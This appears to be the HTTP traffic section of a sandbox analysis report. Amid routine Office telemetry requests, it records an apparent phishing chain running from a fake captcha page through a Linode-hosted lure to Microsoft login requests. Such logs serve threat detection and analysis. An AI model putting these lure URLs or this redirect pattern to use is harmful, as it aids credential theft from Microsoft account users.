    Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /cloud/validate-captcha.php HTTP/1.1Host: colegiojuancalvino.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=22da9769729683659bc0195a69fd9968
    Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /opas/opas.html?e=sample@domain.com HTTP/1.1Host: microcmg.jp-osa-1.linodeobjects.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://colegiojuancalvino.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.2.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://microcmg.jp-osa-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: microcmg.jp-osa-1.linodeobjects.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://microcmg.jp-osa-1.linodeobjects.com/opas/opas.html?e=sample@domain.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://microcmg.jp-osa-1.linodeobjects.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://microcmg.jp-osa-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: gmddqjzslbcuxxqboemm.decorated.it.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://microcmg.jp-osa-1.linodeobjects.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://microcmg.jp-osa-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://microcmg.jp-osa-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://microcmg.jp-osa-1.linodeobjects.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://microcmg.jp-osa-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /attach%2Fbootstrap.min.js HTTP/1.1Host: 5963053387-1317754460.cos.ap-jakarta.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://microcmg.jp-osa-1.linodeobjects.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: www.office.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638812907206847860.MWIxMDY0ZTItYmM5Ni00M2IzLThiNDMtZGE1OWRhNzk0ZmMxYWI4ZWZjYzQtNTZmMi00MzgwLWExMDEtYTc0ZTI5ODdhY2Nk&ui_locales=en-US&mkt=en-US&client-request-id=ba651f70-bce4-4aca-8b42-40c53145ac1e&state=1H_7hRKg8dtxfQnszta-VybGdR61VaWOFYoMKJG2ttadv_xV4YsYERfKSJLV16kjzIBwbpfsg7lcX5yZntM87e-GQCDgtv-B87UINv_RxudT6r6uYPW99AgPHPKuBouE3K8lKqfSo5PbIOnwC8SZnyuA_TrMoONv3NyylCGl0b-JR814jaXSRqJba0a61YK6jKzreiFpdVhJC-SMB5eq68SCdpkq7425psvnOZ42j-qm8wU7Fsv9UFg6eQ6ckrNNr_u1rpdvDJZlODxnChErDQ&x-client-SKU=ID_NET8_0&x-client-ver=8.5.0.0 HTTP/1.1Host: login.microsoftonline.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
    Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
